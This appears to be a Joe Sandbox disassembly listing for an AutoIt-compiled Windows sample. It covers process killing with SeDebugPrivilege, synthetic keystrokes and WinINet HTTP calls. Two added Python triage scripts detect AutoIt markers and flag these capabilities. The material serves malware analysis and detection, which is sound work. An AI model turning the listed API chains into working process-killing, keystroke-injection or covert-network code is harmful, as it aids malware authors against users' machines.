              Similarity
              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
              • String ID:
              • API String ID: 3113390036-3916222277
              • Opcode ID: 0c5acad495dd7ddf09b2099c0a44ef209630204c09c445ec2434493035c1d27e
              • Instruction ID: b6dc6416ff79f7a39856ffcb307c316dc0c164a0353473d73fd3f198d18aef88
              • Opcode Fuzzy Hash: 0c5acad495dd7ddf09b2099c0a44ef209630204c09c445ec2434493035c1d27e
              • Instruction Fuzzy Hash: 49317CB1601308AFD7629FA5CC88ABB7BFCEB49744F14851EF486D2210DB78DD049B65
              APIs
              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00713AAF,?,?,Bad directive syntax error,0076CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 007398BC
              • LoadStringW.USER32(00000000,?,00713AAF,?), ref: 007398C3
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00739987
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: HandleLoadMessageModuleString_wcslen
              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
              • API String ID: 858772685-4153970271
              • Opcode ID: a9e269a17ab2d6e4b35a7943a4fb53368661db7443857effa26837f5dc1a28be
              • Instruction ID: 7928cdc2cf152a5156d6d48401b141ff6506439a16a4085b603d4843ce78d35e
              • Opcode Fuzzy Hash: a9e269a17ab2d6e4b35a7943a4fb53368661db7443857effa26837f5dc1a28be
              • Instruction Fuzzy Hash: D521B471D0025EEBDF15AF90CC06EED7736FF18300F04441AF515661A2DB79A628DB25
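The routine above carries the AutoIt3 interpreter's error-format strings and passes the `>>>AUTOIT SCRIPT<<<` marker as an argument. As an added triage example (not part of the Joe Sandbox report and not code from the analysed sample), the following Python scans a PE image or a memory dump for that marker and for the AutoIt3 compiled-script container. The marker string is taken from this report; the 16-byte container header and the `AU3!EA06` version tag that follows it are facts about the AutoIt3 file format, not data from this analysis. The interpreter is a Unicode build, so the marker is searched in both ASCII and UTF-16LE. The image bytes are constructed inline.

```python
"""Scan a PE image or memory dump for AutoIt3 compiled-script markers."""

# Marker listed for this routine in the report's string table.
SCRIPT_MARKER = ">>>AUTOIT SCRIPT<<<"
# AutoIt3 compiled-script container: a 16-byte header immediately followed by an
# 8-byte version tag. Both constants come from the AutoIt3 format, not from this report.
AU3_HEADER = bytes.fromhex("a3484bbe986c4aa9994c530a86d6487d")
AU3_VERSION_TAG = b"AU3!EA06"

MARKERS = {
    "script-marker": (SCRIPT_MARKER.encode("ascii"), SCRIPT_MARKER.encode("utf-16-le")),
    "au3-header": (AU3_HEADER,),
    "au3-version-tag": (AU3_VERSION_TAG,),
}


def find_all(data: bytes, needle: bytes) -> list:
    """Every offset at which needle occurs in data (overlaps included)."""
    offsets, pos = [], data.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(needle, pos + 1)
    return offsets


def autoit_markers(data: bytes) -> dict:
    """Map marker name -> sorted offsets, listing only markers that were found."""
    found = {}
    for name, needles in MARKERS.items():
        offsets = sorted(o for n in needles for o in find_all(data, n))
        if offsets:
            found[name] = offsets
    return found


def embedded_script_offsets(data: bytes) -> list:
    """Offsets of AU3 headers that are directly followed by the version tag.

    Only header + tag identifies an embedded script container; the text marker on
    its own just shows that the AutoIt3 interpreter code is present in the image.
    """
    start, end = len(AU3_HEADER), len(AU3_HEADER) + len(AU3_VERSION_TAG)
    return [o for o in autoit_markers(data).get("au3-header", [])
            if data[o + start:o + end] == AU3_VERSION_TAG]


def is_compiled_autoit(data: bytes) -> bool:
    return bool(embedded_script_offsets(data))


# Constructed sample image: fake DOS header, the interpreter's wide-string marker,
# then an embedded script container. These are not bytes from the analysed sample.
SAMPLE_IMAGE = (
    b"MZ" + b"\x00" * 62
    + SCRIPT_MARKER.encode("utf-16-le")
    + b"\x00" * 16
    + AU3_HEADER + AU3_VERSION_TAG + b"\x01\x02\x03\x04"
)

if __name__ == "__main__":
    print(autoit_markers(SAMPLE_IMAGE), is_compiled_autoit(SAMPLE_IMAGE))
```

Run it against the executable section dump listed under Memory Dump Source to see the marker, and against the full file or the resource section to find the script container; a hit on the marker alone means the interpreter is present, while header plus tag is what a script extractor would carve from.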
              APIs
              • GetParent.USER32 ref: 007320AB
              • GetClassNameW.USER32(00000000,?,00000100), ref: 007320C0
              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0073214D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ClassMessageNameParentSend
              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
              • API String ID: 1290815626-3381328864
              • Opcode ID: f107ac6b18a28d8a41e2f7b7e177f5c65d3bf0f582e46efe92c045a524f06f60
              • Instruction ID: 8dfd014febe5f36b1f5b6f436b1fbff5c0959fcdb5cac0f76a40a8e2bfdff386
              • Opcode Fuzzy Hash: f107ac6b18a28d8a41e2f7b7e177f5c65d3bf0f582e46efe92c045a524f06f60
              • Instruction Fuzzy Hash: 8A11E3B668871EB9FA022224ED06DB7379CCB04324F20015AFB05A50E7FEA969035618
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
              • String ID:
              • API String ID: 1282221369-0
              • Opcode ID: 98eaf1aa8db762972f091f95f26b90050fa767fb2b08d1bb0985a8c7704c0b8d
              • Instruction ID: 2fc5c6819e06a99f8a3af5397176a69a7ca00f161ca8030ff2e4312c7df0eaa8
              • Opcode Fuzzy Hash: 98eaf1aa8db762972f091f95f26b90050fa767fb2b08d1bb0985a8c7704c0b8d
              • Instruction Fuzzy Hash: 78614973A04302EFDB22AFB4D88966E7BE5AF05310F14476DF945A72C2D63DAD018791
              APIs
              • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00765186
              • ShowWindow.USER32(?,00000000), ref: 007651C7
              • ShowWindow.USER32(?,00000005,?,00000000), ref: 007651CD
              • SetFocus.USER32(?,?,00000005,?,00000000), ref: 007651D1
                • Part of subcall function 00766FBA: DeleteObject.GDI32(00000000), ref: 00766FE6
              • GetWindowLongW.USER32(?,000000F0), ref: 0076520D
              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0076521A
              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0076524D
              • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00765287
              • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00765296
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
              • String ID:
              • API String ID: 3210457359-0
              • Opcode ID: 623fea6e7e9f8b648037a5c459cf90159b9ed8ee681cd02ee3d60994a4558418
              • Instruction ID: 8bdb8b99762e30df70c46ed8709839f7201a762aca9e505ea10b152bf054ec04
              • Opcode Fuzzy Hash: 623fea6e7e9f8b648037a5c459cf90159b9ed8ee681cd02ee3d60994a4558418
              • Instruction Fuzzy Hash: 0A519270A41A08FEEF249F28CC59BD93B65FB06321F148111FD17962E0C3BDA990EB55
              APIs
              • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00726890
              • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 007268A9
              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007268B9
              • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 007268D1
              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007268F2
              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,006E8874,00000000,00000000,00000000,000000FF,00000000), ref: 00726901
              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0072691E
              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,006E8874,00000000,00000000,00000000,000000FF,00000000), ref: 0072692D
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Icon$DestroyExtractImageLoadMessageSend
              • String ID:
              • API String ID: 1268354404-0
              • Opcode ID: d6b9c59ff612a45e63d3e0f52d23b6f980a4598fa293e220072b0de570e12e60
              • Instruction ID: a5536db9ac273d6ff36c92aff29d4a13d05fd7370b0bb7d3c9081560d95670b3
              • Opcode Fuzzy Hash: d6b9c59ff612a45e63d3e0f52d23b6f980a4598fa293e220072b0de570e12e60
              • Instruction Fuzzy Hash: BE51A870600349EFDB20CF25CC95BAA7BB6EF88350F108519F946972A0DBB8E991DB50
              APIs
              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0074C182
              • GetLastError.KERNEL32 ref: 0074C195
              • SetEvent.KERNEL32(?), ref: 0074C1A9
                • Part of subcall function 0074C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0074C272
                • Part of subcall function 0074C253: GetLastError.KERNEL32 ref: 0074C322
                • Part of subcall function 0074C253: SetEvent.KERNEL32(?), ref: 0074C336
                • Part of subcall function 0074C253: InternetCloseHandle.WININET(00000000), ref: 0074C341
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
              • String ID:
              • API String ID: 337547030-0
              • Opcode ID: 0680e363e104d739e0b94aee18874776dc03688f1318fa73f1858981511b0b0e
              • Instruction ID: 98ef851e4a431c5ce2d4ef5473934a91c362f7f8047d6e0182cb193791330184
              • Opcode Fuzzy Hash: 0680e363e104d739e0b94aee18874776dc03688f1318fa73f1858981511b0b0e
              • Instruction Fuzzy Hash: DD31AF71202745EFDB629FB5DC04A76BBF8FF18300B04842DF99686620D7B9E8149B60
              APIs
                • Part of subcall function 00733A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00733A57
                • Part of subcall function 00733A3D: GetCurrentThreadId.KERNEL32 ref: 00733A5E
                • Part of subcall function 00733A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007325B3), ref: 00733A65
              • MapVirtualKeyW.USER32(00000025,00000000), ref: 007325BD
              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007325DB
              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 007325DF
              • MapVirtualKeyW.USER32(00000025,00000000), ref: 007325E9
              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00732601
              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00732605
              • MapVirtualKeyW.USER32(00000025,00000000), ref: 0073260F
              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00732623
              • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00732627
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
              • String ID:
              • API String ID: 2014098862-0
              • Opcode ID: e9c4d3b46787181fda0e4f9fc104202ad761656a1e39a24fe3e88b9f6e2d7599
              • Instruction ID: 58749824395ef0a3cd213885e9637fcb0f503eef39c5a056950e5e8f64cbda7a
              • Opcode Fuzzy Hash: e9c4d3b46787181fda0e4f9fc104202ad761656a1e39a24fe3e88b9f6e2d7599
              • Instruction Fuzzy Hash: 0901B170390314BBFB206768DC8FF693E59DB4AB12F104041F359AE0E2C9EA28458A6D
              APIs
              • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00731449,?,?,00000000), ref: 0073180C
              • HeapAlloc.KERNEL32(00000000,?,00731449,?,?,00000000), ref: 00731813
              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00731449,?,?,00000000), ref: 00731828
              • GetCurrentProcess.KERNEL32(?,00000000,?,00731449,?,?,00000000), ref: 00731830
              • DuplicateHandle.KERNEL32(00000000,?,00731449,?,?,00000000), ref: 00731833
              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00731449,?,?,00000000), ref: 00731843
              • GetCurrentProcess.KERNEL32(00731449,00000000,?,00731449,?,?,00000000), ref: 0073184B
              • DuplicateHandle.KERNEL32(00000000,?,00731449,?,?,00000000), ref: 0073184E
              • CreateThread.KERNEL32(00000000,00000000,00731874,00000000,00000000,00000000), ref: 00731868
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
              • String ID:
              • API String ID: 1957940570-0
              • Opcode ID: bba34851ef44c44349ff529f565cf02bcadf1eb55fc13f5368194b4992b6db62
              • Instruction ID: 7af4586682d79fdd02922e4202f9aea89e0a75d119d406d5ee64f6d68ef4e480
              • Opcode Fuzzy Hash: bba34851ef44c44349ff529f565cf02bcadf1eb55fc13f5368194b4992b6db62
              • Instruction Fuzzy Hash: DE01BFB5240348BFE711AB65DC4EF673B6CEB8AB11F418411FA45DB191C6B59C00CB34
              APIs
                • Part of subcall function 0073D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0073D501
                • Part of subcall function 0073D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0073D50F
                • Part of subcall function 0073D4DC: CloseHandle.KERNEL32(00000000), ref: 0073D5DC
              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0075A16D
              • GetLastError.KERNEL32 ref: 0075A180
              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0075A1B3
              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0075A268
              • GetLastError.KERNEL32(00000000), ref: 0075A273
              • CloseHandle.KERNEL32(00000000), ref: 0075A2C4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
              • String ID: SeDebugPrivilege
              • API String ID: 2533919879-2896544425
              • Opcode ID: a113764b83badd6d8d7ccc8dffd7bd66d3a5f4dd373e8a4efb2b348a3950ccb6
              • Instruction ID: 2d5076510f2ac23343b7d3232febcbdc6b508e1886fbf137faa63d9ed84abe1f
              • Opcode Fuzzy Hash: a113764b83badd6d8d7ccc8dffd7bd66d3a5f4dd373e8a4efb2b348a3950ccb6
              • Instruction Fuzzy Hash: E761B171204242AFD710DF19C495F65BBE1BF84318F14859CE8568B7A3C7BAEC49CB92
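Three of the routines listed in this section are the ones an analyst would keep as indicators when this interpreter code is reused in other samples: the Toolhelp32 enumeration followed by OpenProcess/TerminateProcess next to the `SeDebugPrivilege` string (directly above), the AttachThreadInput plus PostMessageW sequence that posts WM_KEYDOWN (0x0100) and WM_KEYUP (0x0101) for VK_LEFT (0x25) and VK_RIGHT (0x27), and the WinINet InternetOpenUrlW/HttpSendRequestW client. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses API listings in the plugin's own line format into per-function call sets, counting the indented "Part of subcall" lines as indirect calls, and flags those three combinations. The input is copied from the three entries on this page and trimmed to their API and String ID lines; the rule names are my own.

```python
"""Turn Joe Sandbox IDA-plugin 'APIs' listings into per-function capability flags."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed input: API and "String ID" lines copied from three function entries in
# this report (process termination, synthetic keystrokes, WinINet client). The other
# per-function lines (Memory Dump Source, hashes) were dropped; the parser ignores them.
SAMPLE = """\
APIs
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0075A16D
• GetLastError.KERNEL32 ref: 0075A180
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0075A268
• CloseHandle.KERNEL32(00000000), ref: 0075A2C4
  • Part of subcall function 0073D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0073D501
  • Part of subcall function 0073D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0073D50F
• String ID: SeDebugPrivilege
APIs
  • Part of subcall function 00733A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007325B3), ref: 00733A65
• MapVirtualKeyW.USER32(00000025,00000000), ref: 007325BD
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007325DB
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00732623
• String ID:
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0074C272
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0074C29A
• InternetCloseHandle.WININET(00000000), ref: 0074C341
• String ID:
"""

# "• [Part of subcall function ADDR: ]Name.MODULE[(args)][,] ref: ADDR"
CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
    r"([A-Za-z_]\w*)\.([A-Za-z0-9_]+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)$")
STRING_RE = re.compile(r"^•\s*String ID:\s*(.*)$")

WM_KEYDOWN, WM_KEYUP = 0x0100, 0x0101   # the window messages in the PostMessageW calls


@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: tuple
    ref: int
    via: str | None      # address of the callee when the call happens inside a subcall


def parse_functions(text: str) -> list:
    """Split the listing at each 'APIs' header and collect calls and strings per function."""
    funcs, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"calls": [], "strings": []}
            funcs.append(cur)
            continue
        if cur is None:
            continue
        if m := CALL_RE.match(line):
            via, api, mod, args, ref = m.groups()
            argv = tuple(args.split(",")) if args else ()
            cur["calls"].append(Call(api, mod, argv, int(ref, 16), via))
        elif m := STRING_RE.match(line):
            cur["strings"] += [s for s in m.group(1).split("$") if s]   # '$' separates strings
    return funcs


def flags_for(func: dict) -> list:
    """Capability rules derived from the API chains in this report (rule names are mine)."""
    apis = {c.api for c in func["calls"]}
    hits = []
    if ({"CreateToolhelp32Snapshot", "OpenProcess", "TerminateProcess"} <= apis
            and "SeDebugPrivilege" in func["strings"]):
        hits.append("process-enumerate-and-kill")
    keydown = any(c.api == "PostMessageW" and len(c.args) > 1
                  and c.args[1] == f"{WM_KEYDOWN:08X}" for c in func["calls"])
    if "AttachThreadInput" in apis and keydown:
        hits.append("synthetic-keystrokes")
    if {"InternetOpenUrlW", "HttpSendRequestW"} <= apis:
        hits.append("wininet-http-client")
    return hits


def triage(text: str) -> list:
    """One summary record per function: locator address, API set, strings and flags."""
    out = []
    for f in parse_functions(text):
        direct = [c.ref for c in f["calls"] if c.via is None]
        out.append({
            "first_ref": f"{min(direct):08X}" if direct else None,
            "apis": sorted({c.api for c in f["calls"]}),
            "strings": f["strings"],
            "flags": flags_for(f),
        })
    return out


if __name__ == "__main__":
    for entry in triage(SAMPLE):
        print(entry["first_ref"], entry["flags"])
```

Feeding the whole function listing of a report through `triage` gives a compact list of which routines implement which capability, which is easier to diff between AutoIt-compiled droppers than the fuzzy hashes. Indirect calls are included deliberately: the Toolhelp32 enumeration above only appears as a subcall, and a rule that looked at direct calls alone would miss it.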
              APIs
              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00763925
              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0076393A
              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00763954
              • _wcslen.LIBCMT ref: 00763999
              • SendMessageW.USER32(?,00001057,00000000,?), ref: 007639C6
              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007639F4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$Window_wcslen
              • String ID: SysListView32
              • API String ID: 2147712094-78025650
              • Opcode ID: 5c7dcfc4952fdc0402e8fbca96f5d5dd2ce03124b1360d96417510374086a4bd
              • Instruction ID: b19383b339d33875891d6c9d52597726938d4ef7b59656340d169247639685a7
              • Opcode Fuzzy Hash: 5c7dcfc4952fdc0402e8fbca96f5d5dd2ce03124b1360d96417510374086a4bd
              • Instruction Fuzzy Hash: 6441D871A00319ABEF219F64CC49FEA77A9EF08354F10016AF955E7281D7B99D80CB94
              APIs
              • _ValidateLocalCookies.LIBCMT ref: 006F2D4B
              • ___except_validate_context_record.LIBVCRUNTIME ref: 006F2D53
              • _ValidateLocalCookies.LIBCMT ref: 006F2DE1
              • __IsNonwritableInCurrentImage.LIBCMT ref: 006F2E0C
              • _ValidateLocalCookies.LIBCMT ref: 006F2E61
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
              • String ID: &Ho$csm
              • API String ID: 1170836740-2077702024
              • Opcode ID: f6a94c6f19235291afb56e7521eb9cc2da098255eacefc04e7aa7ffc6c5fd22d
              • Instruction ID: f703c9eea8bb3f9fb39bf99ab3fd6a378596394a0355c0b63e31ddac373f0123
              • Opcode Fuzzy Hash: f6a94c6f19235291afb56e7521eb9cc2da098255eacefc04e7aa7ffc6c5fd22d
              • Instruction Fuzzy Hash: F141A434A0021EABCF10DF68C855AEEBBB6BF45354F148155EA14AB392D7359A11CFD0
              APIs
              • LoadIconW.USER32(00000000,00007F03), ref: 0073C913
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: IconLoad
              • String ID: blank$info$question$stop$warning
              • API String ID: 2457776203-404129466
              • Opcode ID: 08e135b5ef8f20f1f7049caa3c0956f4cb09f55a839453ff335c4f3606bd45b9
              • Instruction ID: 7719464671d4327051e223bf23474e459e5ed616b19606c50cd7e6a43706e579
              • Opcode Fuzzy Hash: 08e135b5ef8f20f1f7049caa3c0956f4cb09f55a839453ff335c4f3606bd45b9
